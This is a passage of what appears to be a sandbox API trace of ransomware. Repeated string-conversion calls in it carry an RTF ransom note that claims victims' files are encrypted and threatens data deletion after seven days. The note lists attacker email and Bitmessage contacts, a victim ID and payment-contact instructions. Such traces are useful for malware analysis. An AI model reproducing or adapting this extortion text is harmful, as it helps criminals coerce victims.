thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.217] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 